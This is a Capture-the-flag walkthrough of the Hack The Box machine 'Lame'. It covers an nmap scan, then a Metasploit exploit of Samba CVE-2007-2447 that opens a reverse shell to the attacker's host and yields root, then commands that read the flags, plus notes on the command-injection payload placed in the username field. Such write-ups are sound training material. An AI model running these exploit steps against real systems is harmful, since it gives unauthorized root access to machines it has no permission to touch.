Overview
Lame is one of the first machines on HTB and a classic entry point. The attack path is straightforward: an outdated Samba version exposes CVE-2007-2447, which allows unauthenticated remote code execution as root.
Enumeration
Start with an nmap scan covering all ports:
nmap -sC -sV -p- --min-rate 5000 -oN lame.nmap 10.10.10.3Key findings:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 3.0.20
The Samba version 3.0.20 is the interesting one.
Foothold
CVE-2007-2447 — Samba username map script
Samba 3.0.0 through 3.0.25rc3 with the username map script option enabled allows RCE via shell metacharacters in the username field of an MS-RPC call.
Using Metasploit:
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.5
runWe get a root shell immediately — no privesc needed.
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)
Flags
# user flag
cat /home/makis/user.txt
# root flag
cat /root/root.txtNotes
- vsftpd 2.3.4 also has a backdoor (CVE-2011-2523) but it wasn't triggered on this box.
- The Samba exploit works because the username is passed directly to
/bin/shviapopen()without sanitization. - Metasploit automates this but the manual PoC sends
nohup /bin/sh -c 'payload'in the username field via the MSRPCSESSION_SETUP_AND_Xcall.